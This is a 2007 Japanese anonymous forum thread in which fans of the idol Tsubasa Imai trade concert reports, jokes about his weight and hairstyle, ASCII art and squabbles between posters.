デカ盛りメニュー特集を見て、3人前ラーメンは完食出来そう
1.8リットルパフェには「すごいカロリー…強烈ですねぇ」
視聴者からの質問(おばさんファンをどう思うか?
紺でつに無視されてる様に感じる)には、誤解ですのでご安心をとw
いくつになっても心にハリのある女性は素敵だなと言ってました

364 :ななしじゃにー:2007/02/12(月) 19:18:49 ID:7UI6g2wT
スマソorz逝きます

365 :ななしじゃにー:2007/02/12(月) 19:34:51 ID:lhd4+9mb
d !


366 :ななしじゃにー:2007/02/12(月) 19:38:08 ID:vlynC78R
レポ姐サンズd!

>364
丼米!3人前ラーメン完食できそうってw

367 :ななしじゃにー:2007/02/12(月) 20:13:10 ID:aOYV+0Na
基地の妄想うぜえ
ここでやれよ

377 名前:ユーも名無しネ[sage] 投稿日:2007/02/12(月) 19:49:11
つはソロ選んだのに滝が説得したらしいお

473 名前:ユーも名無しネ[sage] 投稿日:2007/02/12(月) 19:55:34
つ今からでもソロ天候しろし
ソロ向きだお

513 名前:ユーも名無しネ[sage] 投稿日:2007/02/12(月) 19:58:24
つはソロの方が踊るからいいお

368 :ななしじゃにー:2007/02/12(月) 20:58:42 ID:3Sa7f1ed
姐サンズレポdでした

ラーメン3人前も強烈なカロリーだぞつww

369 :ななしじゃにー:2007/02/12(月) 21:17:53 ID:F4jGx/61
またパーヤン度が増したと聞いたぞ、つw

370 :ななしじゃにー:2007/02/12(月) 21:20:47 ID:gGYJSF+T
えー パーヤン まじですか
でも、食道楽の旅してたらそうなるか

371 :ななしじゃにー:2007/02/12(月) 21:25:03 ID:3Sa7f1ed
牛タン行ったけどそんなにパーヤンが増したとも思わなかったよ
いや、もう目が慣れただけかもしれんが

372 :ななしじゃにー:2007/02/12(月) 21:32:54 ID:ZntTR2qa
レポd!

373 :ななしじゃにー:2007/02/12(月) 21:44:42 ID:RsXGkJ+l
牛舌で見たけど身体も相変わらず薄っぺらかったよ。

374 :ななしじゃにー:2007/02/12(月) 22:07:56 ID:0SGC4w/Y
薄かったけどつが目の前に来た時に本来は見えないはずのパンシのファスナーの金具が
照明で光ってたから若干お肉はついてるとオモw

375 :ななしじゃにー:2007/02/12(月) 22:40:33 ID:L2NIT7Tu
ソロコン夏頃はフェースラインがもちょっとシャープだった

376 :ななしじゃにー:2007/02/12(月) 22:46:46 ID:9fzjvECS
>374
緑ベルベに自分は気になったw
でもあのときは中にデニム履いてんだよな

377 :ななしじゃにー:2007/02/12(月) 22:57:18 ID:LVmyBfaL
ベルベは重ね着だから許してやってw
たしかにあの衣装の時は、腹回り凄いな

378 :ななしじゃにー:2007/02/13(火) 00:01:56 ID:j/XDyYgM
コンの感想が腹回りに限定されるとはw
でも自分も許すぞ


379 :ななしじゃにー:2007/02/13(火) 00:33:17 ID:mRWQf/5c
>374
思った思ったw
チャックあいてるんじゃと思って焦ったw

380 :ななしじゃにー:2007/02/13(火) 00:36:17 ID:vw8RhQBn
つのグィーンに注目するとどうしても腹回りの様子も目にはいっちまうんだなw

381 :ななしじゃにー:2007/02/13(火) 07:22:24 ID:V3Q9Os3e
>362
自分がハリを与えてるって自覚があるんだな( ̄ー ̄)

382 :ななしじゃにー:2007/02/13(火) 08:31:52 ID:Yf/LaCY5
昨日の牛舌番組のつを見て友がジョニーデップだ!と言ってたw
確に似ててワロタよ

383 :ななしじゃにー:2007/02/13(火) 08:57:22 ID:qiIYjU1S
>382
それラジオにメールしてやれ
泣いて喜びそうだぞw

384 :ななしじゃにー:2007/02/13(火) 09:16:14 ID:WL44lAdg
泣いて喜びそうだからこそメールするのやめてくれw

385 :ななしじゃにー:2007/02/13(火) 10:10:06 ID:yo7UaVfU
あー似てるwww

386 :ななしじゃにー:2007/02/13(火) 13:03:00 ID:SLhNRmpl
>384
いやもう多分意識してやってるだろうから手遅れw

387 :ななしじゃにー:2007/02/13(火) 13:27:28 ID:K39OXiLA
褒めたら髭メガネ気に入っちゃうから危険

388 :ななしじゃにー:2007/02/13(火) 13:51:11 ID:Yf/LaCY5
>387
そーだった
メガネだけならいいが髭は…だからやめとく

389 :ななしじゃにー:2007/02/13(火) 15:38:23 ID:XkIMnBsn
ファッソンはジョニデ意識してないよな。
どちらかと言えば、バイカー系・・・・・・・あぁ、ボノ意識かw

390 :ななしじゃにー:2007/02/13(火) 16:39:23 ID:9U8w8F4O
>389
オマイあちこちで鏝になっててウザいんだけど
もう少しロムってクレ

391 :ななしじゃにー:2007/02/13(火) 18:23:23 ID:ZLI6S2ml
何を根拠にあちこちって言ってるんだろう?
ストーカーチックでキモいんだけど

392 :ななしじゃにー:2007/02/13(火) 18:47:26 ID:yJ8k6IJn
湘南の王子カ○ユスw

393 :ななしじゃにー:2007/02/13(火) 22:10:50 ID:sH2kEzcr
つ ジョニーデップするならもっとフェイスラインきっちりホッソリしないと
ただの秋葉君になっちゃうよ

394 :ななしじゃにー:2007/02/13(火) 23:54:05 ID:8a84lA9w
MC中つに行進汁!なんて言った勇気ある姐さんはいないのか脳
リリースまでお茶の間にツライ

395 :ななしじゃにー:2007/02/14(水) 00:00:19 ID:SkbP8hgF
いなかった
自分は席遠すぎて無理デスタ

396 :ななしじゃにー:2007/02/14(水) 00:33:43 ID:J9LHvtnR
つ湘南だっけ?

397 :ななしじゃにー:2007/02/14(水) 01:24:55 ID:ZZJ42Tb7
湘南で間違ってないよ
詳しくは藤沢

398 :ななしじゃにー:2007/02/14(水) 02:03:18 ID:W2K/Fa8C
相方担ですがつが最近面白すぎてスチーなんだけど
本当に腹出ててショックだったよ(w
掛け声対決の時のグウィーン…ポンッ!はスガー面白いけど
至近距離だと恥ずかしくて見れないorz

399 :ななしじゃにー:2007/02/14(水) 02:33:43 ID:rkycokz8
そんなにあからさまに腹ポヨなのかorzorz
髭は剃ればいいが腹はなあ…

400 :ななしじゃにー:2007/02/14(水) 02:50:38 ID:u1SKJv2W
腹も衣装で少しはカバーできるが顔デブは隠せない

401 :ななしじゃにー:2007/02/14(水) 07:35:37 ID:iyj0w5Ot
(w
を相手にすんなよw

402 :ななしじゃにー:2007/02/14(水) 08:32:28 ID:QkbNeMWM
屋が熱いw

403 :ななしじゃにー:2007/02/14(水) 10:48:51 ID:W2K/Fa8C
>401
ダメなんだっけ?
レスするのは隣板なんでついスマソorz

いやピザっててもおもろカッコエエつがスチーになったんだが
このあとの紺もつのMC等テラタノスィミだよ

404 :ななしじゃにー:2007/02/14(水) 12:04:07 ID:E4wnRIzg
(…`д´)>403
キニスンナ

405 :ななしじゃにー:2007/02/14(水) 12:57:52 ID:W2K/Fa8C
>404
d
密かに禿ウレスィーだったりする


406 :ななしじゃにー:2007/02/14(水) 13:49:39 ID:zGgnX2SJ
    _。_
  ∧(_ア
 ( ・∀・)っ旦~● オチャとチョコドゾー


407 :ななしじゃにー:2007/02/14(水) 14:27:57 ID:kM0GKFWj
>403
とりあえず半年ロムったらいいと思うよ

408 :ななしじゃにー:2007/02/14(水) 16:51:33 ID:W2K/Fa8C
なんだかつスレ住人さんは色々複雑だな
ロム専のくせにたまたまレスした自分が悪かったよ
もう二度とレスしない

409 :ななしじゃにー:2007/02/14(水) 17:29:03 ID:35xAxCQr
自治厨死ね

410 :ななしじゃにー:2007/02/14(水) 17:40:23 ID:kE16uj2q
>408
自分も散々書き方については注意されたよ
次から気をつければいいんだよ

で、ホントに腹でてるの?w

411 :ななしじゃにー:2007/02/14(水) 17:46:57 ID:8xq8nG2L
前がえぐれてたくらい細かったから、ちょっとプヨってるようにはどうしても見えると思う
立ち方のせいで余計腹でてるように見えるんだよ。

412 :ななしじゃにー:2007/02/14(水) 17:53:01 ID:AcSvXviq
仙台で脱いでたけど全然出てなかったよ。
それにしてもファンサ論争すごいなw
反省して欲しいとか、コンサート行くのコワイとか。
つ担も結構メルヘン多かったんだなー

413 :ななしじゃにー:2007/02/14(水) 18:12:31 ID:iyj0w5Ot
腹は水っ腹でポコってることはあったけどなw

414 :ななしじゃにー:2007/02/14(水) 18:14:08 ID:NsXxGSIM
周りにその手のがいなかったので気づかなかったが
つもやっぱりアイドルだったんだな、よかったなとシミジミしたw

415 :ななしじゃにー:2007/02/14(水) 18:15:40 ID:PdDGIbwa
>413
つじゃなくファンサされたヤシに行かないだけいいよw
若いヲタが居るとこはそれがあるけど

416 :ななしじゃにー:2007/02/14(水) 18:19:00 ID:NsXxGSIM
連投スマソ
そういや仙台は両部とも、1曲目終わった瞬間、客煽るより先に水分補給してたわw
アンコでは最後、首筋にふりかけたあと、ヲタに向かって残りを撒いてたな
今更だが、今回はドライアイスの銃?がないんだよね
自分に向けて打って涼むつを見るの隙だったんだが

417 :ななしじゃにー:2007/02/14(水) 18:19:02 ID:PdDGIbwa
412だorz

418 :ななしじゃにー:2007/02/14(水) 18:24:44 ID:35xAxCQr
自治厨死ね

419 :ななしじゃにー:2007/02/14(水) 18:27:31 ID:iyj0w5Ot
>417
ちょとドチドチしたw

ファンサはソロでもあんなだったし今となっては見慣れた姿だから
嫌がるのは新鮮な反応だたよ

420 :ななしじゃにー:2007/02/14(水) 18:49:03 ID:30M7a5rb
つ◇◆◇◆
今日バレンタインだからつにあげるw

421 :ななしじゃにー:2007/02/14(水) 19:12:54 ID:tQwrRjsB
∧_∧
                              (…`д´)b
                               (⊃  ̄\/ ̄oヽ
                              (__つ      0 l
                               ヽ        /
                                \     /
                                  .\ ./
                                    .¥

422 :ななしじゃにー:2007/02/14(水) 19:14:54 ID:ptURyRla
>(…`д´)
耳耳!

423 :ななしじゃにー:2007/02/14(水) 19:20:00 ID:tQwrRjsB
_| ̄|○

424 :ななしじゃにー:2007/02/14(水) 20:02:23 ID:lxfZKGFp
芸能人の秘蔵映像が見れる掲示板!!
↓↓↓ 必見
http://talk.milkcafe.net/test/read.cgi/girlidol/1091148903/785

425 :ななしじゃにー:2007/02/14(水) 20:05:59 ID:rkycokz8

   ∩_∩
  (  ・(ェ)・)
  (…`д´) <また太る…
  (つ.◆と) ∬
  と_)_) 旦 ◇◆◇

426 :ななしじゃにー:2007/02/14(水) 20:38:45 ID:zGgnX2SJ
つ■ BABBIのウエハースもあげる

427 :ななしじゃにー:2007/02/14(水) 21:12:07 ID:djT+8Am7
>421
姐さんグッジョブ
ミミがあーー! 
かわええんだけど、思わずふいちゃいました
ホッ〜、熊ごとさらいたい

428 :427:2007/02/14(水) 21:13:20 ID:djT+8Am7
最後の行
>425 が抜けちゃった
姐さんカワイイ dです

429 :ななしじゃにー:2007/02/14(水) 22:57:24 ID:fzKDoJXO
しょこたんがBABBIのウエハース ブログで紹介してた

430 :ななしじゃにー:2007/02/15(木) 00:06:46 ID:gRY3z3Da
早いもので最後の行進から2週間ですね

431 :ななしじゃにー:2007/02/15(木) 00:14:33 ID:mHBqCFdD
そうですねw
石川で誰か言ってやって

432 :ななしじゃにー:2007/02/15(木) 00:16:31 ID:5z6cN2IJ
105 名無しさん 2007/02/14(水) 22:20:11
Mon aileを閉鎖した理由を教えてください

112 名無しさん 2007/02/14(水) 22:21:12
>>105
滝沢秀明を徹底的に叩くためです

Mon aile
今井翼のファンブログ。でも近々移転予定です(涙)ここのブログ重たすぎ・・・

http://mon-aile.seesaa.net/

433 :ななしじゃにー:2007/02/15(木) 00:22:07 ID:y4hDVfiT
>421
ワロタw
>423
落ち込むなw

434 :ななしじゃにー:2007/02/15(木) 00:25:59 ID:1zTCWDQn
つドSって言うくせに嫌われるの好きだよね
絶対ドMだと思う
つ担S多いならトバセにメールして苛めてやればいいのにw

435 :ななしじゃにー:2007/02/15(木) 00:45:21 ID:K5l8OfTy
そろそろちゃぶ台投げるかねw

436 :ななしじゃにー:2007/02/15(木) 00:52:54 ID:Bo7PQi8l
お昼かも、16時かもとか思っちゃうんだよねw

437 :ななしじゃにー:2007/02/15(木) 00:53:47 ID:8n0H5ieJ
豚切りスマソ
牛舌姐さんは一応今日のウォッチン張った方がいいかも試練

438 :ななしじゃにー:2007/02/15(木) 01:52:46 ID:NfQfB5Vf
>434
情緒不安定なんです

439 :ななしじゃにー:2007/02/15(木) 06:24:45 ID:JYdHjwnG
>434
妄想ウザス
知ったかするの好きだね

440 :ななしじゃにー:2007/02/15(木) 06:43:45 ID:JYdHjwnG
>421
他人の作ったAAを勝手に都合のいい部分だけコピペするなよ
それって元々ツレとセットになってるやつだろ?

441 :ななしじゃにー:2007/02/15(木) 07:03:26 ID:9yWpz/Wt
朝っぱらから細かい事をチクチクと
血圧上がるよ、お婆ちゃん

442 :ななしじゃにー:2007/02/15(木) 07:04:48 ID:JYdHjwnG
>441
またすぐ飛んできたw

443 :ななしじゃにー:2007/02/15(木) 07:24:52 ID:KMx1J3xc
>441
オマイも毎日朝から壺と避難所に張りついてるけどチュプ?
年寄り臭いレスが浮いてるよ

444 :ななしじゃにー:2007/02/15(木) 10:24:54 ID:gS9kUO2e
オマイラがくだらない事で言い争ってる間もバカにされてるよ

824 :名無しさんは見た!@放送中は実況板で :2007/02/15(木) 03:19:14 ID:bsekabHU0
>821
滝つオタと言っても、滝オタのほとんどが解散を願ってるから
一部のつオタだけがカツン恨んでると思うよ
本当にマジで解散すりゃいいのに

445 :ななしじゃにー:2007/02/15(木) 10:44:55 ID:K5l8OfTy
  ⊂⊃  /~~\ ⊂⊃
...............,,,,傘傘傘::::::::傘傘傘.............
 ∧_∧
(…`д´)      キキーッ!
O┬O )
◎┴し'-◎ ≡


 ∧_∧
(`д´ )    スルーッ
O┬O )
◎┴し'-◎ ≡

446 :ななしじゃにー:2007/02/15(木) 14:04:12 ID:mTt+hvAs
ユニスレや滝スレが荒らされてる時はここが人稲になるから分かりやすいおね
ID出る板は何かと不便ですね

447 :ななしじゃにー:2007/02/15(木) 14:22:23 ID:gS9kUO2e
おねって…キモ!w

448 :ななしじゃにー:2007/02/15(木) 14:53:42 ID:jNC6cYoR
今日はとばせだw

449 :ななしじゃにー:2007/02/15(木) 15:59:39 ID:AemZ1kyv
こ〜のまま〜
なんじかんでもぉ〜

って牛舌で歌っていたの思い出し笑いしてしまった
見るたびにトークの腕上げていくのはアレなんなの?

450 :ななしじゃにー:2007/02/15(木) 18:09:45 ID:X+C2dIjf
ハイティーンブギを歌うビッグトシの真似もワラタw
暴走気味のつトークは面白いよね
やっぱラジオは偉大だな
当初はハラハラしたがw

451 :ななしじゃにー:2007/02/15(木) 18:39:16 ID:tgSHXFzi
鯱まで暴走トークが持続してますようにナム

452 :ななしじゃにー:2007/02/15(木) 19:42:22 ID:zTTP7O8j
>448
姐さんd!!自分スカーリ忘れてたorz

453 :ななしじゃにー:2007/02/15(木) 20:43:23 ID:zbuGX2Rl
某作家のブログに
赤倉サルくんと騒いでいたとの報告があった
バレンタインに会えるなんて裏山だ

454 :ななしじゃにー:2007/02/15(木) 21:10:34 ID:VMaFwbYN
>453
懐かしいね、サルくんw


455 :427:2007/02/15(木) 21:15:44 ID:Lvd9yOSi
未だにちゃんと交流続いているんだね
なんかいいなー
サル好きだったな 次の舞台かTVに是非つを出してくだされ

456 :ななしじゃにー:2007/02/15(木) 21:17:14 ID:6Jz2p/LD
できれば続編見たいけどスドウタソ出産したばっかだもんね

457 :ななしじゃにー:2007/02/15(木) 22:46:57 ID:tZLMYMA1
サルサル言うからへっぽこ推理をするサルがみたくなったじゃないか!
一口でおにぎりをを頬張るサルやはたかれるサルも・・・

458 :ななしじゃにー:2007/02/15(木) 22:52:11 ID:1liRGMRi
DVD引っ張り出してこよw

459 :ななしじゃにー:2007/02/15(木) 23:00:16 ID:tgSHXFzi
>453
d見てくる

460 :ななしじゃにー:2007/02/16(金) 00:32:08 ID:v3WnkfUk
更新キタ

461 :ななしじゃにー:2007/02/16(金) 00:33:25 ID:MskJfetm
283行進
キタワァ*・゜゚・*:.。..。.:*・゜(n‘∀‘)η゚・*:.。..。.:*・゜゚・* !!!!

お子様に言えない映画じゃなかたんだなw

462 :ななしじゃにー:2007/02/16(金) 00:33:47 ID:MIqvVFCO
★て

463 :ななしじゃにー:2007/02/16(金) 00:35:18 ID:A/anLd+9
行進キテター!!!
dd
今週末もガンガッテクレ

464 :ななしじゃにー:2007/02/16(金) 00:36:09 ID:dS/Q8B8E
ジェームスディーンなら髭ないしパーヤンでもないしいいなw

465 :ななしじゃにー:2007/02/16(金) 00:40:58 ID:bK5Tz6/Z
久々の更新キタ━━━━━━(゚∀゚)━━━━━━!!!
今週末もバス移動なんだな。

466 :ななしじゃにー:2007/02/16(金) 00:44:36 ID:PtcQHWCZ
>464
リーゼントだけどなw

467 :ななしじゃにー:2007/02/16(金) 00:49:55 ID:hyA6Efwy
つ姉の子の名前、つが考えるんだってなw
キニナル・・・


更新キタね(*´∀`)
久々で禿嬉シスw

468 :ななしじゃにー:2007/02/16(金) 00:50:15 ID:dS/Q8B8E
>466
マズーだなw

469 :ななしじゃにー:2007/02/16(金) 00:53:51 ID:wxl5/HhG
Weblog / 2007-02-15 00:36:50

住所氏名晒しちゃった時点で、当時おつきあいがあった方には
ばれてるしねん。

というわけで、はい、私は今井翼サンのファンです。
以前こんなblogつけてました。

http://mon-aile.seesaa.net/

最初は滝沢秀明さんのファンだったんですね。
滝沢さんが義経やってた頃、岩手の東下りを追っかけてった
こともありましたねえ(遠い目)

で、途中から今井翼サンの方のファンになってしまったんですね。
どうも滝沢秀明さんはそれが気に入らないのもあって、
希望もないのに粘ってるみたいです。

470 :ななしじゃにー:2007/02/16(金) 00:55:21 ID:wxl5/HhG
で、まあ、私が自分のことを大天使ジブリールだ自覚するまで、
いろいろありすぎてここには書ききれないわけですが、

簡単に言ってしまいますと

今井翼サンは、天界から家出してきた私、大天使ジブリールをおっかけて、
地上にやってきた大天使ラファエル様で、どうもこの二人は天上では
結婚というか婚約?してたみたいなんですね。

というわけで、今井翼サンと私は夫婦同然です〜♪
翼サンファンの方、ごめんなさい☆

でも私が
http://mon-aile.seesaa.net/
このブログつけてた頃、「翼ってあなたのブログ見てるかも」
と言って来た方、いらっしゃいましたよね。

さあ、ここまで書いてしまえばアクセス跳ね上がるだろう。どうよ。

471 :ななしじゃにー:2007/02/16(金) 00:57:02 ID:hRP5xuls
リーゼントは悪夢が蘇るw

472 :ななしじゃにー:2007/02/16(金) 00:57:39 ID:xV7wpMkj
>466
ヤバス
登場の時無駄にドチドチしそうだwww

473 :ななしじゃにー:2007/02/16(金) 01:01:17 ID:Chfr+cHl
更新乙!
彼の作品はちゃんと観たことないなぁ

ゆきだるまが痩せてたのにはワロタw

474 :ななしじゃにー:2007/02/16(金) 01:03:25 ID:hEVh7Sgz
ヒッパレの時のリーゼントは良かったけどなw

475 :ななしじゃにー:2007/02/16(金) 01:07:32 ID:xV7wpMkj
あん時はジーンズがえらい事でリーゼントどころでは無かったからじゃ

476 :ななしじゃにー:2007/02/16(金) 01:13:21 ID:PtcQHWCZ
まずはスリムな皮ジャン(理由なき反抗)とR・ローレン風な白シャツ(エデンの東)
購入ケテーイかな?

477 :ななしじゃにー:2007/02/16(金) 01:25:03 ID:afd70HrH
ツアー中1回は凸出しやりそうジャマイカ

478 :ななしじゃにー:2007/02/16(金) 01:50:42 ID:MskJfetm
前髪もちょうど長くて邪魔そうだしなw

479 :ななしじゃにー:2007/02/16(金) 04:46:26 ID:BgmnP2DU
>473
とけかかってたのかボウリングのピンに見えたw

480 :ななしじゃにー:2007/02/16(金) 05:00:45 ID:JrgKxmvM
>467
いい加減鏝直せデブスオバ
分からないならロムレ

481 :ななしじゃにー:2007/02/16(金) 06:29:14 ID:Sp/m0YOG
>480
おまいみたいなのがロムってたらいいよ

482 :ななしじゃにー:2007/02/16(金) 07:24:06 ID:JrgKxmvM
>481
オマイもう秋田
毎日何やってるの?

483 :ななしじゃにー:2007/02/16(金) 07:26:31 ID:JrgKxmvM
スレの主気取りで一日中監視かよ
よっぽど暇なんだなw
鏝のせいで恥をかくのは同担だって分かってる?

484 :ななしじゃにー:2007/02/16(金) 07:28:43 ID:JrgKxmvM
ズニア板の避難所も回ってるしね
向こうに張り付いてるのもバレバレですよw
他にやる事無い訳?デブスオバサン

485 :ななしじゃにー:2007/02/16(金) 07:33:49 ID:JrgKxmvM
まずそのスルー出来ない性格を直した方がいいよ
何でもかんでも食い付いて来てしつこいよ

486 :ななしじゃにー:2007/02/16(金) 09:06:00 ID:k3bEqwbp
ドSを自覚してるつが「髪切らない」とわざわざ明言したということは、
ディーンリーゼントが現実になりそうで、ガクブルしつつ楽しみだw


487 :ななしじゃにー:2007/02/16(金) 10:15:56 ID:BgmnP2DU
ちょっと待て
ブラックレインって優作のだよな?
たしか優作の髪型も(ry

488 :ななしじゃにー:2007/02/16(金) 11:12:28 ID:9BIkmjSE
そのときは全員でブーイングだな。
水で濡らして戻ってくるからw

489 :ななしじゃにー:2007/02/16(金) 11:38:29 ID:M65hER5p
水で濡らしてきたことあったな。ナツカシスw

490 :ななしじゃにー:2007/02/16(金) 13:48:23 ID:FQCvtuUw
髪型は水に濡らせばもとどうりだが姐の子供のゴットファーザーは一生もんだぞ
いいのか姉?w

491 :ななしじゃにー:2007/02/16(金) 14:58:39 ID:dS/Q8B8E
実況に落ちてた候補w
慕乃 愛 貫太 要 湾星 瓶衣

492 :ななしじゃにー:2007/02/16(金) 16:24:18 ID:29UcdGt2
瓶て

493 :ななしじゃにー:2007/02/16(金) 18:01:12 ID:xV7wpMkj
候補っていうか、うっかり付けちゃったらどーすんだよ、つ!なリストだからw

シスコンだからめちゃめちゃ可愛がるんだろうな

494 :ななしじゃにー:2007/02/16(金) 18:05:11 ID:J5X+oXfj
姉の子が物心ついた時につをパパンだと勘違いしなければ良いがw

495 :ななしじゃにー:2007/02/16(金) 19:03:41 ID:EbiFcRp7
単身赴任でつと同居ならともかく、それは無いわw


候補に加えて!
値留射津

496 :ななしじゃにー:2007/02/16(金) 21:08:14 ID:3zzTdGnT
茶土(チャド)

497 :427:2007/02/16(金) 21:29:01 ID:JBjCjKrE
そこまで出たらやっぱりこれ

優都雨 (U2)うわ、怒られそうー

498 :ななしじゃにー:2007/02/16(金) 21:30:37 ID:JBjCjKrE
スマン、この間書き込んでから名前欄消し忘れてお恥ずかしいです

499 :ななしじゃにー:2007/02/17(土) 16:27:30 ID:pdBsCdiR
髪型がキニナルw

500 :ななしじゃにー:2007/02/17(土) 17:20:14 ID:wQQI8r/0
>499
ベム&パーヤンorz

501 :ななしじゃにー:2007/02/17(土) 17:26:28 ID:pdBsCdiR
ヽ(`Д´)ノ

502 :ななしじゃにー:2007/02/17(土) 17:32:57 ID:hfNZC3A3
バロスw
明日行くからある意味楽しみ

503 :ななしじゃにー:2007/02/17(土) 17:43:26 ID:aw67L5WQ
ベムというよりセンター分けだったラスィんだがw
明日がたのすぃみw

504 :ななしじゃにー:2007/02/17(土) 18:47:27 ID:+sXRsxpp
O沢M生氏みたいなセンター分け?

505 :ななしじゃにー:2007/02/17(土) 20:45:25 ID:vyZac2FB
You 前髪切っちゃいなよ

506 :ななしじゃにー:2007/02/18(日) 01:20:46 ID:wR129cxC
つはスレイブで滑ってたらしいけど大丈夫かね

507 :ななしじゃにー:2007/02/18(日) 01:54:09 ID:UAyIbki3
2部でズニアの子と左右に交差する時に滑った
ドライアイスのせいかも
一瞬痛そうな顔してたけど後半持ち直してたよ


508 :ななしじゃにー:2007/02/18(日) 02:00:05 ID:OITqWgAo
ベムパーヤン
    (((∧∧∧)))
    (((;´Д`))
    (((∩  ∩))ガクブル

509 :ななしじゃにー:2007/02/18(日) 02:01:05 ID:OITqWgAo
ベジータとかアニメヲタじゃないんだから頼むよ

510 :ななしじゃにー:2007/02/18(日) 09:55:37 ID:skodWbBT
ベジータなんてアニヲタじゃなくても知ってるじゃんw
ヲバサンなの?

511 :ななしじゃにー:2007/02/18(日) 11:26:44 ID:UlSIKEfB
スタイル魂のときくらいの髪型が
ライブではベストと思うんだなジヌンは

512 :ななしじゃにー:2007/02/18(日) 11:50:48 ID:HSFr0HAB
文句はいいからレポヨロ

513 :ななしじゃにー:2007/02/18(日) 15:13:42 ID:wplfwis5
/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
|ツバサ見てみなさい。
|あれがバカだよ。

   ̄ ̄ ̄ ̄ ̄ ̄V ̄ ̄
 タカーイ♪
    ∧,,∧
   ( ゚д゚ )
   ノ  ∧_∧
 〜(_ ∩ ゚Д゚ )
  (⌒し| \_ ⌒)
  |   \__/
  | |   丿
  | |   |

514 :ななしじゃにー:2007/02/18(日) 15:15:49 ID:wplfwis5
/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
|もっと見てみなさい。
|あれがバカだよ。

   ̄ ̄ ̄ ̄ ̄ ̄V ̄ ̄
 タカーイ♪
    ∧,,∧
   ( ゚д゚ )
   ノ  ∧_∧
 〜(_ ∩ ゚Д゚ )
   (し| \_ ⌒)
   |  \__/
   | |   丿
   | |   |

515 :ななしじゃにー:2007/02/18(日) 19:12:13 ID:R4vGV57g
早く人間になりたーい

516 :ななしじゃにー:2007/02/18(日) 19:14:32 ID:R4vGV57g
スマン

517 :ななしじゃにー:2007/02/18(日) 20:12:04 ID:oCNEWgNS
魔性の腰が健在でした

518 :ななしじゃにー:2007/02/18(日) 23:08:37 ID:UAyIbki3
ビズもいいしダンスもギターも申し分ない
ベム髪もそんなに気にならない
でもそろそろパーヤンからは脱出してホスイ
新潟2部アンコで上半身裸で飛び跳ねるつの胸が揺れていたのにガクブルしたw

519 :ななしじゃにー:2007/02/18(日) 23:18:14 ID:UlSIKEfB
>518姐さんが見間違ってるようにナム

520 :ななしじゃにー:2007/02/18(日) 23:30:39 ID:LjMgkD5R
http://saturn-tv.net/~uwasa/bbs/taki/index.html#1

521 :ななしじゃにー:2007/02/18(日) 23:53:46 ID:SpRZ5lNB
ジヌンもビクーリダタ
あんなにプヨ腹とは
あんなにニ顎とはorz

522 :ななしじゃにー:2007/02/19(月) 00:33:57 ID:3pv8WWO8
胸元はツア-開始から既に少し落ちたか?とヲモテただけに
たすかに腹にはちとビク-リ
でも気にして少し隠そうとしてたのがカバエエジャマイカw
ノリノリだたのか腰はいつもにも増してスゴス
グラインドに加え突き上(ry

523 :ななしじゃにー:2007/02/19(月) 00:36:01 ID:1RrtpCdt
髪型はベムというよりまんま美国だ
身体は肋骨も出てる位だからパーヤンではないとオモ

524 :ななしじゃにー:2007/02/19(月) 00:36:06 ID:3pv8WWO8
あ、あと左手首にテ-ピンクしてた
昨日痛めたんだろか…

525 :ななしじゃにー:2007/02/19(月) 01:11:08 ID:l2AFqRz5
ナニナニ腹隠そうとしてたの?w

526 :ななしじゃにー:2007/02/19(月) 01:14:28 ID:PB1HlpKD
美国は今よりカコよくなかったけど顔がもちょっと痩せてた
仮面のビデオクリップ顔スッキリしててスキだけど修正してる!?

527 :ななしじゃにー:2007/02/19(月) 01:19:17 ID:VuzLF6wE
してますん

528 :ななしじゃにー:2007/02/19(月) 01:22:17 ID:GLdNSEUf
早くライブフォト買いたい
某所で見たけどめちゃめちゃビズ良かった

529 :ななしじゃにー:2007/02/19(月) 02:28:51 ID:3pv8WWO8
>525
ダブルアンコは白ジャケだけ羽織って出てきたが
歌う前に少し裾を寄せてた
トリプルは上半身裸だたけど
途中で腰に巻いたイヤモニ?のベルトをパンシの上まで上げてた


そんな事したところで丸見えだたケドナ-w

530 :ななしじゃにー:2007/02/19(月) 02:56:30 ID:/tLre8AL
もとがカリカリだから
多少膨らんだほうがいいんじゃマイカとは思えど
姐さんタチのレポ見ると
結構なデ○゙に思える…
今回のツアーが初生つなので
なぁんだ大丈夫じゃん!
と…思え…ますよね?

531 :ななしじゃにー:2007/02/19(月) 03:13:53 ID:QxJqbMXM
わざとらしいですおね

812 名前:ユーも名無しネ[sage] 投稿日:2007/02/19(月) 00:53:00
ヌード時代のつはキャワだったお

825 名前:ユーも名無しネ[sage] 投稿日:2007/02/19(月) 00:53:53
>812
今と何が違うのかもう思い出せないけど確かにキャワだったお

532 :ななしじゃにー:2007/02/19(月) 03:15:24 ID:QxJqbMXM
誰にも興味持たれてないのに自演必死だお

533 :ななしじゃにー:2007/02/19(月) 03:21:17 ID:QxJqbMXM
何でここと話題がリンクしてるんだろうねw

827 名前:ユーも名無しネ[sage] 投稿日:2007/02/19(月) 00:54:11
>812
すらっとしてたおね
今は紺がないとデブだおね

534 :ななしじゃにー:2007/02/19(月) 12:15:39 ID:l2AFqRz5
姐さんレポトン!
自分もチェックしてみるよw

535 :ななしじゃにー:2007/02/19(月) 16:16:01 ID:K5vAyqBp
デ○゙ネタ以外のレポ
・石川2部で嵐の大野君のモノマネを一瞬だけ披露
・新潟1部MCでパソコンの話になり
つはメール以外のパソコンの機能が全くわからないらしく
コンの打ち合せに使う企画書も全て手書きらしい
・新潟2部MCで楽屋の話になり
つは相変わらずの忘れんぼうのおじいちゃんで
目の前にあるのに"オレのリップ知らない?"とか"ティッシュどこ?"とかマネージャーによく聞くらしい
そのあとの狂虹でもダウンベストを着忘れてしまい
イントロ始まってから気付いて慌てて取りに行ってたw
・新潟2部トリプルアンコでアンコ終了して捌けるとき
1人だけ下手で立ち止まり会場に向けて両手で投げチッス
新潟は終始ニコニコ楽しそうだった

石川と新潟記憶違いがあったらスマソ

536 :ななしじゃにー:2007/02/19(月) 16:57:30 ID:XeA5nA6X
>535
トン!
平安のモノマネが気になるw
歌マネ?動き?

537 :ななしじゃにー:2007/02/19(月) 17:13:17 ID:37Uxn0MP
>535
d!おじいちゃんつワロス

そういやリップ大人買いしたんだったよなw

538 :ななしじゃにー:2007/02/19(月) 17:44:30 ID:dFRTU+1y
>535
d!
そうやってリップを各所に無くしていくのかw

意外と機会オンチっぽいよね。
配線は好きだけど、ネットの接続は姉にやってもらったとか言ってたよね。
ビデオの録画も姉に頼むとか言ってたけど、もしや録画機能も使いこなせないのかつ?w

